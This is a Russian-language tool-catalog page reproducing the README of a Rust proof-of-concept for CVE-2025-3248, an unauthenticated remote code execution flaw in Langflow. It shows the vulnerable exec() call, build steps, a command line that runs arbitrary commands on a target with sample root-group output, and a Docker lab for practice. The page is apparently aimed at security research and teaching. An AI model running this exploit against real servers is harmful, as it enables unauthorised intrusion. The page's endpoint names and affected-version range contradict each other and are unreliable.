Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3248-POC — Эксплойт на основе Rust для CVE-2025-3248, критической неаутентифицированной RCE в Langflow через /api/v1/validate/code, позволяющий произвольное выполнение команд. | Kitploit
Инструменты/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Эксплойт на основе Rust для CVE-2025-3248, критической неаутентифицированной RCE в Langflow через /api/v1/validate/code, позволяющий произвольное выполнение команд.

Репозиторий
189 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт удаленного выполнения кода Langflow - CVE-2025-3248

⚠️ Отказ от ответственности
Этот код предназначен строго для образовательных и исследовательских целей. Несанкционированное использование в системах без явного разрешения может представлять собой нарушение закона.
Автор не несет ответственности за любое неправомерное использование или вредоносную деятельность, связанную с этим инструментом.


Информация об уязвимости

CVE-2025-3248 - Критическая

CVSS Score: 9.8 | EPSS Score: 92.57% | Опубликовано: 22 мая 2025 г.

Затронутые версии

  • Уязвимые: Все версии ≤ v1.3.0
  • Исправленные: Версии v1.3.0+

Вектор атаки

Конечная точка /api/v1/validate/code принимает несанитизированный код Python и выполняет его напрямую с помощью exec(), не требуя аутентификации.

Уязвимый код

# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Технический анализ

Langflow предоставляет конечную точку /api/v1/builder/execute_code, которая принимает предоставленный пользователем код Python и передает его напрямую в exec() на серверной части. Поскольку отсутствует аутентификация или изоляция, злоумышленники могут создавать произвольные полезные нагрузки для выполнения кода.

Запуск эксплойта

Требования

  • Rust 1.70+ (установить через rustup)
  • Cargo (менеджер пакетов Rust)
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Пример:

❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Настройка локальной лаборатории

Быстрый старт

> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Остановка лаборатории

> sudo docker-compose down
Скачать инструмент